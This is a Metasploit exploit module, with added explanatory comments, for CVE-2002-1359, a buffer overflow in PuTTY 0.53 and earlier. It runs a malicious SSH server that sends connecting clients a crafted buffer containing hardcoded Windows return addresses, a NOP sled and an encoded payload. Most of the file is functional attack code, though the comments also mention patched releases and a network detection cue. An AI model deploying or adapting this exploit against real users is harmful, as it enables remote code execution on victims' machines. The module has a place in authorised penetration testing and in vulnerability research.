##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Server-side exploit module for CVE-2002-1359 (see 'References' below).
# The module does not connect out: it listens as an SSH server (TcpServer
# mixin, SRVPORT defaulting to 22) and pushes a crafted response to any PuTTY
# client that connects. Per the 'Description', the underlying bug is a
# validation error in SSH.c affecting PuTTY 0.53 and earlier, so the client-side
# mitigation is running a later release; on the network side, a server that
# announces the banner used in on_client_connect and immediately sends a large
# binary blob without waiting for any client input is the observable pattern
# (inferred from the code below; verify against a capture before alerting on it).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # TcpServer: the framework runs a listener and calls on_client_connect for
  # each inbound connection.
  include Msf::Exploit::Remote::TcpServer

  # Registers module metadata, payload constraints, targets and the SRVPORT option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'PuTTY Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the PuTTY SSH client that is
          triggered through a validation error in SSH.c. This vulnerability
          affects versions 0.53 and earlier.
        },
        'Author' => 'MC',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2002-1359' ],
          [ 'OSVDB', '8044'],
          [ 'URL', 'http://www.rapid7.com/advisories/R7-0009.html' ],
          [ 'BID', '6407'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        # Constraints handed to the payload encoder: 400 bytes of room, no NUL
        # byte in the encoded payload, no framework-added NOP padding. The NUL
        # bytes written literally in on_client_connect are framing, not the
        # encoded payload, which is what BadChars constrains.
        'Payload' => {
          'Space' => 400,
          'BadChars' => "\x00",
          'MaxNops' => 0,
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        # Each target is a single fixed return address, so the module is
        # specific to exactly these OS / service-pack / language builds.
        'Targets' => [
          [ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
          [ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ],
          [ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2002-12-16',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been characterised
        # for this module.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])
      ]
    )
  end

  # Called by the TcpServer mixin for every client that connects.
  #
  # Regenerates the payload for this client, builds the response buffer, writes
  # it to the client without reading anything first, hands off to the payload
  # handler and then closes the connection.
  #
  # @param client [Object] the connected client socket provided by the mixin
  # @return [nil] returns early if no payload could be generated
  def on_client_connect(client)
    # NOTE(review): `== nil` is unidiomatic Ruby (`.nil?` reads better); left
    # unchanged here.
    return if ((p = regenerate_payload(client)) == nil)

    # Layout, as visible below: an OpenSSH version banner, a fixed binary
    # header, runs of comma-separated 64-char alphanumeric filler each closed
    # by the four-byte marker "\x00\x00\x07\xde" (its meaning is not documented
    # here), then the target return address packed as little-endian 32-bit
    # ('V'), 10 NOPs and the encoded payload, followed by more filler.
    buffer =
      "SSH-2.0-OpenSSH_3.6.1p2\r\n" +
      "\x00\x00\x4e\xec\x01\x14" +
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
      "\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde" +
      (((((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde") * 2) +
      (((rand_text_alphanumeric(64)) + ",") * 2) + rand_text_alphanumeric(21) +
      [target.ret].pack('V') + make_nops(10) + p.encoded +
      (((rand_text_alphanumeric(64)) + ",") * 15) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
      (((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
      (((rand_text_alphanumeric(64)) + ",") * 21) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
      (((((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde") * 6) +
      "\x00\x00\x00\x00\x00\x00"

    # Logs the total size and the peer address before sending.
    print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")

    client.put(buffer)
    # Hands control to the payload handler (framework-provided).
    handler

    service.close_client(client)
  end
end